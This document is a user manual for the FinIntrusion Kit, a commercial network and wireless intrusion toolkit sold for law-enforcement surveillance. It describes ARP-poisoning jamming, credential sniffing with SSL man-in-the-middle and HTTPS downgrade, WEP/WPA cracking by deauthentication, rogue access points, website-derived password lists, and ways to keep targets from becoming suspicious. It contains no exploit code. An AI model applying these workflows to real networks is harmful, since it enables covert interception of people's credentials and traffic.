finintrusion kit · web viewis a multi-purpose it intrusion kit that has been built specifically...
TRANSCRIPT
FinIntrusion Kit / User Manual
1
FinIntrusion Kit / User Manual
2
Copyright 2011 by Gamma Group International, UK
Date 2011-09-23
Release information
Version Date Author Remarks
1.0 2011-05-26 PK Initial version
1.1 2011-08-12 PK Review for release 2.1
1.2 2011-09-23 PK Review for release 2.2
FinIntrusion Kit / User Manual
3
Table of Content
1 Overview.............................................................................................................................................5
2 FinIntrusion Kit – Toolset.....................................................................................................................6
3 Equipment...........................................................................................................................................7
3.1 Notebook.....................................................................................................................................7
3.2 USB Hard-Disk..............................................................................................................................7
3.3 Wireless Equipment.....................................................................................................................8
4 Operating System................................................................................................................................9
4.1 Introduction.................................................................................................................................9
4.2 Notebook Usage..........................................................................................................................9
5 Installation.........................................................................................................................................10
5.1 Pre requirements:......................................................................................................................10
5.2 License.......................................................................................................................................12
5.3 Update Software........................................................................................................................14
6 Configuration.....................................................................................................................................16
6.1 Network Configuration..............................................................................................................16
6.1 Wireless Configuration..............................................................................................................17
6.2 Language Options......................................................................................................................18
7 FinIntrusion Kit – Network Intrusion.................................................................................................19
7.1 Target Identification..................................................................................................................19
OS System Scan can trigger an AV Detection / Warning and is not working against all Target systems.Jam Target...............................................................................................................................19
Jam Target.............................................................................................................................................20
FinIntrusion Kit / User Manual
4
7.2 Monitor Target..........................................................................................................................21
7.2.1 PCAP Recorder...................................................................................................................22
7.2.2 Open URL in Browser.........................................................................................................23
8 FinIntrusion Kit – Wireless Intrusion..................................................................................................24
8.1 Wireless Network Identification................................................................................................25
8.2 Identify hidden ESSID.................................................................................................................26
8.3 Jam Wireless Network...............................................................................................................27
8.4 Break Encryption........................................................................................................................28
8.4.1 WEP Cracking.....................................................................................................................28
8.4.2 WPA/WPA2-PSK.................................................................................................................30
8.5 Wireless Client Identification.....................................................................................................31
8.6 Fake / Rogue Access Point.........................................................................................................32
8.6.1 Adapter Selection...............................................................................................................33
8.6.2 Reply-to and broadcast all seen ESSID’s:............................................................................33
8.6.3 Emulate access-point only for ESSID..................................................................................34
8.6.4 “Monitor all” Button..........................................................................................................34
9 Password Generator Utils..................................................................................................................35
9.1 Limitations.................................................................................................................................36
10 FinIntrusion Kit – Other Options....................................................................................................37
10.1.1 Delete / Delete all..............................................................................................................37
10.1.2 Data Export........................................................................................................................37
11 Activity Log....................................................................................................................................38
12 Support..........................................................................................................................................39
FinIntrusion Kit / User Manual
5
1 OVERVIEW
The FinIntrusion Kit is a multi-purpose IT Intrusion kit that has been built specifically for nowadays operations by Law Enforcement and Intelligence Agencies. It can be utilized in a wide-range of operational scenarios like:
Breaking into- and monitoring Wireless and Wired Networks
Remotely breaking into E-Mail Accounts
Performing security assessments of Servers and Networks
The full capabilities are shown in several training courses, each focusing on different operational use-cases.
The following topics are covered within this document:
Equipment Installation Configuration Usage
FinSpy
FinSpy Mobile
FinFly
FinUSB Suite
FinIntrusion
Kit
FinFireWireFinTraining
FinAdvisory
FinIntrusion Kit / User Manual
6
Support
FinIntrusion Kit / User Manual
7
2 FININTRUSION KIT – TOOLSET
All the tools within the Backtrack system require advanced knowledge on basic techniques related to their purpose. Most tools have to be used on the command-line as they do not provide any graphical user interface.
The FinIntrusion Kit toolset is categorized into the following sub-categories:
Network: Tools for Local Area Network (LAN) Intrusion
- Network Scanner discovers all Systems which are part of the same Local Area Network.- Network Scanner tries to identify Operating System and Hostname from Target PC.- Network Jammer prevents Internet Access for dedicated Systems.- Network Sniffer redirects Traffic in Local Area Network and logs Credentials from a Target
PC.- MAC Change functions to spoof Hardware Address of a local Network Adapter.
Wireless: Tools for Wireless Network- and Client Intrusion
- Wireless Scanner discovers Access Points and connected Wireless Clients from all Wireless Networks which could be reached with the Adapter (and Antenna).
- Wireless Scanner discovers Wireless Clients which search for a known Wireless Network and emulate a “Fake” Access Point for these systems.
- Hidden ESSID Identifier which starts attacks against specific Wireless Network to extract “Hidden ESSID”.
- Wireless Jammer could be started against dedicated Wireless Clients or Access Point to re-route Target Systems over a “Fake” Access Point.
- WEP Cracking against 40/64bit or 104/128bit protected Wireless Networks.- WPA Cracking against WPA-PSK or WPA2-PSK protected Wireless Networks.
Password: Password Generation Utilities
- Password Generator from specific Website. This Generator extracts Words from a specified Website and generates a unique Password List.
Reporting:
- Export Function to save all results to “*.csv” files.- Generate Activity Log with all Status and Result Messages.
FinIntrusion Kit / User Manual
8
3 EQUIPMENTThe kit includes a range of equipment for various local and remote IT Intrusion scenarios. Some usage examples are supplied within the following chapters.
Overview of Equipment
3.1 NotebookThe notebook is the core of the kit. It is loaded with the BackTrack operating system and the FinIntrusion Kit software.
3.2 USB Hard-DiskThe external USB Hard-Disk contains various data to help with certain attacks, for example:
Rainbow Tables for LM/WPA /MD5
Default Password List
Wordlists for various languages and subjects
It can also be utilized as a storage device for gathered information.
FinIntrusion Kit / User Manual
9
3.3 Wireless EquipmentThe included Wireless (802.11) and Bluetooth equipment can be used for short- and long-distance attacks against wireless networks/clients and Bluetooth-enabled devices.
Wireless examples:
Scanning for Wireless Networks and Clients
Breaking WEP/WPA/WPA2 Encryption
Emulating an Access-Point for Client-Side attacks
Monitoring Wireless LAN Traffic
Bluetooth examples:
Scanning for Bluetooth Devices
Executing known attacks like Bluesnarf, Bluebug and more
FinIntrusion Kit / User Manual
10
4 OPERATING SYSTEM
4.1 IntroductionThe FinIntrusion Kit is shipped with a copy of BackTrack 5, an operating system that is based on Linux and includes a complete set of up-to-date IT intrusion and analysis tools.
BackTrack operating system is used by numerous professional IT security companies world-wide.
4.2 Notebook UsageTurn on the notebook and boot with the default settings. After the Backtrack graphical user interface (GDM) is loaded, it is ready to use.
The system can be customized using the programs included in the menu.
FinIntrusion Kit / User Manual
11
5 INSTALLATION
5.1 Pre requirements:
BackTrack 5 – R1 - 32bit operating system
Gnome desktop version
Following packages have to be installed before you can use FinIntrusion Kit:
Mono-runtime
Gtk-sharp2
Dhcp3-server
Whois
FinIntrusion Kit / User Manual
12
To install the software on the FinIntrusion Kit follow these steps:
1. Insert CD-Rom and open the folder FinIntrusion Kit
2. Click on the file “finintrusionkit_installer_v_XXX.ggi”
3. A shortcut for launching FinIntrusion Kit now appears on the desktop (/root/Desktop/FinIntrusionKit.desktop)
FinIntrusion Kit / User Manual
13
5.2 LicensePlace the license “.ggpck” – file on a USB dongle or CD-ROM:
1. Mount USB-Stick or CD/DVD
CD-ROM:
# sudo mount /media/cdrom0
USB-Stick:
# sudo mount /dev/sdb1 /mnt/
2. Copy license file to /tmp
CD-ROM:
# cp /media/cdrom0/CERTS- FinIntrusion-Kit-Customer_ID-Machine_ID-XX.DAYS.ggpck /tmp/ USB-Stick:
# cp /mnt/CERTS- FinIntrusion-Kit-Customer_ID-Machine_ID-XX.DAYS.ggpck /tmp/
3. Start FinIntrusion Kit and press button “import License”.
4. Choose your *.ggpck file and press button “import”.
FinIntrusion Kit / User Manual
14
5. After import the license will be checked.
6. If the license is valid, close the dialog.
7. Restart the FinIntrusion Kit Application.
FinIntrusion Kit / User Manual
15
5.3 Update SoftwareThe FinIntrusion Kit software is updated regularly to meet the requirements within the ever-changing IT.
FinIntrusion Kit is equipped with the option of downloading such software updates. It can be configured to automatically check for updates at certain intervals or the user can check straight away for an update.
Update checks can be configured to run every time the application starts or in various periods of time.
FinIntrusion Kit / User Manual
16
If an update was found, it will show the following dialogue including the automatic installation of the updated software.
After the installation of an update the user can verify that the new version has been installed by checking the version number in the About box.
FinIntrusion Kit / User Manual
17
6 CONFIGURATION
6.1 Network ConfigurationThe user can select the proper Network Adapter by choosing it from the “Interface:” combo box.
For Network Intrusion it is necessary that FinIntrusion Kit is running in the same network as the target system.
If the network adapter has no IP address, press button to get a new IP Address via DHCP.
The user can select the proper Network Interface by choosing it from the “Interface:” combo box.
In order to proceed with the Network Intrusion, click the tab button.
FinIntrusion Kit / User Manual
18
6.1 Wireless ConfigurationThe user can select the proper Wireless Adapter by choosing it from the “Interface:” combo box. To attack a target system which is connected through a wireless network it is necessary to be in the same wireless network.
To configure a wireless adapter for a specific wireless network we recommend using “Wicd Network Manager”.
Start “Wicd”, change Preferences and add Wireless Interface e.g. “wlan0” .
Press “Refresh” Button and select a Wireless Network (SSID Broadcasting should be activated!). Press “Connect” Button to configure all necessary parameter for the selected Wireless Network.
FinIntrusion Kit / User Manual
19
6.2 Language OptionsThe application is translated in a number of languages and the user has the option of choosing one.
Click on “Language” in the main menu on the left side.
After choosing a different language the application has to be restarted so that the changes are effective.
FinIntrusion Kit / User Manual
20
7 FININTRUSION KIT – NETWORK INTRUSION
7.1 Target IdentificationTo monitor or jam a Target system it is necessary to detect the system inside the (W)LAN. This feature is
provided by the “Network Scanner” and can be started with the button.
All Systems inside a network will be listed. By default a class C will be scanned (e.g. 10.0.0.0/24 or 10.0.0.1 – 10.0.0.254). The target must be in the same network where the FinIntrusion Kit runs.
Work flow:
1. ARP Scan captures all MAC Addresses for connected Targets.
2. Try to identify Operating System with OS Fingerprinting technique.
3. Try to identify Hostname.
OS System Scan can trigger an AV Detection / Warning and is not working against all Target systems.
FinIntrusion Kit / User Manual
21
Jam Target
“Network Jammer” blocks a Target of having Internet access.
“Network Jammer” initiates an „ARP Cache Poisoning“Attack against Target PC and overwrites MAC Address from Default Gateway with an invalid value.
The “Network Jammer” runs in the background as long as the FinIntrusion Kit is started or the
button was pressed.
Before (ARP Cache on Target PC)
After (Start „ARP Cache Poisoning“
FinIntrusion Kit / User Manual
22
7.2 Monitor Target“Network Sniffer” can be used to extract all usernames and passwords of known protocols from the network traffic.
Select to start parsing the traffic and printing all account data it finds.
FinIntrusion Kit includes three different types of Monitoring Modes. Default Mode is: “HTTPS Emulation”
Mode Protocols (Examples)
Mode DEFAULT MODE
Protocols (Examples)
Mode Protocols (Examples)
„Non“ SSL Mode = Capture Credentials which were transmitted in CLEARTEXT
SMTPPop3ImapTelnetSNMPHTTPFTP...
“HTTPS Emulation” = Capture Credentials which were transmitted in CLEARTEXT and try to redirect HTTPS HTTP
SMTPPop3ImapTelnetSNMPHTTP & HTTPS (Redirect) FTP...
SSL Mode = Capture Credentials which were transmitted in CLEARTEXT and „encrypted“ with SSL
SMTP & SMTPSPop3 & Pop3s Imap & Imaps TelnetSNMPHTTP & HTTPS FTP...
FinIntrusion Kit / User Manual
23
Note: Enabling “SSL Man-in-the-Middle” option will result in all clients seeing a warning that the SSL/TLS certificate for their servers has changed. This includes all SSL sessions (Web, E-Mail, etc.). This also happens if HTTPS HTTP redirect is not working!
7.2.1 PCAP RecorderThis feature can be used to record all data from a selected Target System into a PCAP File.
This file could be analyzed with different Network Analyze (e.g. Wireshark) or useful as a piece of evidence.
FinIntrusion Kit supports two different types of PCAP Recorder.
Mode Protocols (Examples) Mode Protocols (Examples)
„tcpdump“ Generate a Network Capture File (= pcap file) with „tcpdump“ in the background. A capture Filter for selected IP will be used. No Traffic Analyzer will be started.Generate a File:„/tmp/fik_pcap_recorder_IP-ADDRESS.pcap“
„Wireshark“ Start Wireshark in the foreground with a capture filter for selected Target IP (= selected row).Capture File must be saved at the end of the session!!!
Note: PCAP Recorder could be combined with all three different types of Monitoring Mode.
FinIntrusion Kit / User Manual
24
7.2.2 Open URL in BrowserSelect a FTP, HTTP or HTTPS logged credentials and a special option will be activated in the submenu (“Open URL in Browser”). This feature is useful to verify if the credentials are correct.
Note: The URL / Hostname could be different from URL, which will be typically used for the authentication process (Forwarding, Load Balancer, etc.). For a FTP Accounts the credentials (= username and password) will be used automatically.
FinIntrusion Kit / User Manual
25
8 FININTRUSION KIT – WIRELESS INTRUSIONFor all wireless based attacks, the Alfa USB adapter should be used as its functionality and drivers provided the best support for the applied Wireless Intrusion techniques.
After the Alfa USB adapter is plugged into the notebook via the provided USB cable, it will be recognized
automatically. If the interface isn’t listed, try to reconnect the adapter and press button.
FinIntrusion Kit / User Manual
26
8.1 Wireless Network IdentificationAll Wireless Network Intrusion functions are blocked until a Wireless Network was found.
“Wireless Network Intrusion” Submenu
Press button to scan for wireless networks within the range of the FinIntrusion Kit system and display them including detailed information.
The following information is displayed for discovered networks:
SSIDName of Access-Point / Wireless Network
BSSID MAC address of Access-Point
ChannelUsed Frequency / Channel
EncryptionType of Encryption OPEN/WEP/WPA/WPA2
KeyAfter Decryption
Example of “Wireless Network Scan”
FinIntrusion Kit / User Manual
27
Select an Access Point and a list of “Connected Clients” for this AP will be shown below.
8.2 Identify hidden ESSIDFinIntrusion Kit includes a module to identify a hidden ESSID. For this module it is necessary to have at least one connected client for the selected Access Point.
An ESSID is necessary for WPA Cracking and to setup a Fake AP for a specific ESSID.
After „Identify Hidden SSID“ finished successfully.
Before
FinIntrusion Kit / User Manual
28
8.3 Jam Wireless NetworkTo block all clients, which are connected to a specific Access Point or only one dedicated Wireless Client use the “Wireless Jammer” Module.
Example of “Wireless Jammer” was started.
“Wireless Jammer” sends out de-authentication packages to the Wireless Client(s).
Note: If a specific Connected Wireless is selected (before!) WLAN Jammer was started, only this Wireless Client will be blocked. If no “Connected Wireless Client” is selected, all Wireless Clients will be blocked.
The package counter for Wireless Jammer could be modified in (default value = 10 packages): “/usr/local/finintrusionkit/conf/FinIntrusionKit.cfg”
<?xml version="1.0" encoding="utf-8"?><FinIntrusionKit>....... s n i p .......... <WIRELESS>....... s n i p .......... <Wireless_Deauth_Counter>10</Wireless_Deauth_Counter>....... s n i p .......... </WIRELESS>
FinIntrusion Kit / User Manual
29
</FinIntrusion>
8.4 Break EncryptionFinIntrusion Kit includes a module to break the WEP and WPA/WPA2 (PSK mode) encryption. For this module it is necessary to have at least one connected Wireless Client.
In case a wireless network is encrypted using the WEP or WPA/WPA2 technology, select the encrypted
network and press button.
The software will now try to automatically retrieve the WEP encryption or WPA/WPA pre-share key, which then can be used to join the network.
8.4.1 WEP Cracking
Example of a successful “WEP Crack”
This process should not take longer than 10 minutes. In case it cannot recover the key, try to restart the process. As this technique cannot work on all types of wireless networks, this might need to be done in a manual process.
Work flow:
1. Identify a WEP encrypted Wireless Network with minimum one connected Wireless Client.
FinIntrusion Kit / User Manual
30
2. The connected Wireless Client will be disconnected with de-authentication packages.
3. Target System reconnects to Access Point these packages will be captured in the background.
4. Start a replay attack and replay these fragments.
5. Access Point / Wireless Clients will be triggered to send more packets more encrypted Data packets / IVs will be captured.
6. If enough IVs are collected a WEP Crack could be successful.
Depending on the size of WEP key and if ASCII or HEX values were used, a different amount of packages must be captured.
Key Length Encrypted Data Packages with different IVs
40 / 64 Bit ASCII ~ 30.000 Packages
40 / 64 Bit HEX ~ 40.000 Packages
104 / 128 Bit ASCII ~ 60.000 Packages
104 / 128 Bit HEX ~ 70.000 Packages
FinIntrusion Kit / User Manual
31
8.4.2 WPA/WPA2-PSK
Example of a successful “WEP Crack”
To try to recover a “WPA/WPA2” PSK (=PreShared Key) it is necessary to capture a 4-way Handshake. This handshake will only be done if a Wireless Client connects to a Wireless Network. If this process is passed, the Handshake wouldn’t be send by the Wireless Client anymore (until the next disconnect). To trigger this handshake it is necessary to do an active attack and disconnect a Wireless Client with some de-authentication packages.
Work flow:
1. Disconnect an established Wireless Client Access Point connection (with de-authentication packages)
2. Wireless Client tries to reconnect to the Access Point and pass 4-way handshake.
3. FinIntrusion Kit starts a Wordlist Attack against selected Access Point. On Backtrack exist a password list at the location:
“/pentest/passwords/wordlists/”
WPA Cracking Option Dialog Box
FinIntrusion Kit / User Manual
32
8.5 Wireless Client IdentificationAll Wireless Client Intrusion functions are blocked until a Wireless Network was found.
“Wireless Client Intrusion” Submenu
Press the button to scan for wireless clients within the range of the FinIntrusion Kit system and display them including detailed information.
The following information is displayed for discovered networks:
Client MACMAC Address Wireless Adapter of Target Client
Vendor Translated
„Organizationally Unique Identifier“ (OUI) = uniquely identifies a vendor / manufacturer
BSSIDMAC Address of Access Point (if associated!)
Probed ESSIDNames of previous used Wireless Networks, which Wireless Client is searching for.
FinIntrusion Kit / User Manual
33
8.6 Fake / Rogue Access PointFor this attack, the software emulates a fake Access Point which Wireless clients can find and connect to. This is a very useful attack to get access to targets network traffic and gain the position to attack their system.
Example of “Fake AP” was started
Two different types of Modes exist:
- Reply to all Broadcasts
- Reply to specific ESSID
FinIntrusion Kit / User Manual
34
8.6.1 Adapter SelectionIf a client gets connected and cannot access the internet, no valuable traffic will be created from his side and therefore no essential data can be gathered from monitoring it.
To redirect all traffic from the target wireless stations FinIntrusion Kit system needs an internet connection/uplink.
Using this technique, clients will assign normally to the Access Point and use the internet as they normally do when using public hotspots.
Fake AP - Adapter could only be Wireless Adapter. On this adapter a “Fake Access Point” will be started.
Uplink - Adapter is any other adapter, than “Fake AP – Adapter”, which has the Status “UP”!!! This Interface will be used to provide Internet Access for all connected Wireless Clients. Typically a “cable network interface” should be used in this case.
8.6.2 Reply-to and broadcast all seen ESSID’s:
In this mode, the software see’s all requests for Wireless LAN’s by systems and replies to all of them so the scanning systems connect to the emulated access point. This is very useful as especially Windows systems always scan for recently used Wireless networks (e.g. hotel/hotspot networks).
ESSID text field is deactivated. Gamma doesn’t recommend this Mode. If a Target Subject was previously connected e.g. “My Home Network” / “Hotel XYZ” / “Airport XYZ” and will be connect to an Access Point with the same “Network Name” it could be conspicuous (only if the Person is NOT in this environment anymore!).
FinIntrusion Kit / User Manual
35
8.6.3 Emulate access-point only for ESSID
This feature will emulate a normal access-point which the target systems see when scanning for wireless networks. The chosen ESSID can trick people into selecting and associating to this network.
8.6.4 “Monitor all” ButtonA passive Network sniffer will be started in the background. Features are:
- Capture all credentials from Wireless Clients which are connected to your Fake Access Point.- Traffic from all Wireless Clients will be captured, no single Target selection is necessary.- All Cleartext Passwords like FTP, IRC, SNMP, etc. will be captured (same like Non-SSL Mode
in the network section)- A HTTPS HTTP Emulation will be started automatically in the background, as long as it is
supported by the Target Webpage.
Press the button to stop the Fake-AP and Monitor function.
FinIntrusion Kit / User Manual
36
9 PASSWORD GENERATOR UTILSThe “Website Profiling” module can be used to crawl a website, extract all words and export it to a password list. This specific password list could speed up a Brute Force Attack against a well know Target (e.g. web based Forum, Email Account etc.).
Example of “Wordlist” generated from webpage “www.finfisher.com”:
Work flow:
1. A Webcrawler will be started. This Crawler mirrors max. 500 different Webpages from a Webserver and save it in “/tmp” – directory.
2. A Webparser will extract all Words and save it to a text file: “/tmp/WEBSITE.txt”
3. All Words will be imported into GUI and duplicates will be removed.
Note: Words which are longer than 33 characters will be ignored.
FinIntrusion Kit / User Manual
37
9.1 LimitationsThe „Website Profiling“ module has some limitations:
Only Webpages in HTML are support. Other Sourcecode (e.g. ASP, JS) could generate some unusable Words (e.g. Methods or Variable Names).
Only Webpages without Pre-authentication, Session-Cookie etc. could be analyzed.
No Proxy Authentication is supported.
Wordlist must be cleaned up manually. (Remove Nonsense / unlike used Words, like Methods or Variable Name etc.)
FinIntrusion Kit / User Manual
38
10 FININTRUSION KIT – OTHER OPTIONSFinIntrusion Kit provides some additional functions, which are available if a dedicated target PC or user credential is selected. User should select a row (left mouse key) and press right mouse key to get a submenu.
Submenu of “Network Scan” Submenu of “Wireless Scan”
10.1.1 Delete / Delete allDelete selected row or all entries in the list.
10.1.2 Data ExportSave all data tab separated into an external text file. This file could be analyzed e.g. with Excel.
Example of Target List loaded with Excel
FinIntrusion Kit / User Manual
39
11 ACTIVITY LOGFor legal reasons, FININTRUSION KIT records all actions that have been executed with a time stamp. The action log can be exported into a regular TXT / CSV file.
Example of Wireless Activity Log:
FinIntrusion Kit / User Manual
40
12 SUPPORTAll customers have access to an after-sales website that gives the customers the following capabilities:
Download product information (Latest user manuals, specifications, training slides)
Access change-log and roadmap for products
Report bugs and submit feature requests
Inspect frequently asked questions (FAQ)
The after-sales website can be found at
https://www.gamma-international.de
o Username:
o Password:
FinIntrusion Kit / User Manual
41